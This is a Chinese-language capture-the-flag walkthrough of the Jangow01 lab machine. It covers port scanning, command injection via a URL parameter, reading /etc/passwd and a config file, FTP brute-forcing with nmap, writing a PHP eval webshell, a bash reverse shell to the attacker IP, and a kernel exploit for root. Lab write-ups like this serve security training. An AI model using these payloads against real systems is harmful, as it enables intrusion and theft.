信息收集
目标机IP:192.168.43.163
攻击机IP:192.168.43.118
端口扫描:nmap -sC -sV 192.168.43.163
开放21,80两个端口,通过浏览器访问80端口:
点site后,进入了一个正常的页面
点击页面上的标签,直到点击右上角Buscar的时候,页面跳转到http://192.168.43.163/site/busque.php?buscar=
buscar作为一个变量,尝试命令传递
http://192.168.43.163/site/busque.php?buscar=ls,有返回信息
发现有一个wordpress文件夹,查看一下里面的文件信息:
?buscar=ls wordpress,里面有config.php和index.html文件
查看config.php里面的内容:
得到账号:desafio02,密码:abygurl69
尝试登录系统失败
?buscar=cat /etc/passwd 查看密码信息:
得到jangow01 desafio02,尝试登录也失败。
将jangow01,desafio02,abygurl69写成一个字典,用nmap尝试爆破:
nmap --script ftp-brute --script-args userdb=user.txt,passdb=user.txt -v 192.168.43.163
爆破成功得到账号:jangow01 密码:abygurl69
可以登陆系统和ftp
uname -a 查看系统版本信息: ubuntu 4.4.0-31
?buscar=cat /home/jangow01/user.txt时,得到一串md5加密的字符串:
d41d8cd98f00b204e9800998ecf8427e
尝试在线md5解密: [空密码]/[Empty String]
尝试通过网页写入后门:
?buscar=echo ‘<?php eval($_POST['xx']);?>’ > 1.php
写完之后成功通过菜刀连接,查看文件,在html文件夹下有.backup文件,里面记录正确的账号密码
反弹shell
直接bash -i >& /dev/tcp/192.168.43.118/1234 0>&1时,发现系统转换了很多字符
通过菜刀在site文件夹中创建一个shl.php文件,写入如下内容:
然后浏览器访问http://192.168.43.163/site/shl.php,反弹成功
提权操作
searchsploit ubuntu 4.4.0
发现可用文件45010.c
通过ftp或者菜刀上传到服务器
gcc 45010.c -o exp //生成可执行文件
chmod +x exp //添加exp的执行权限
./exp //执行exp文件
成功提权,cd /root进入root文件,有proof.txt
cat proof.txt 成功拿到flag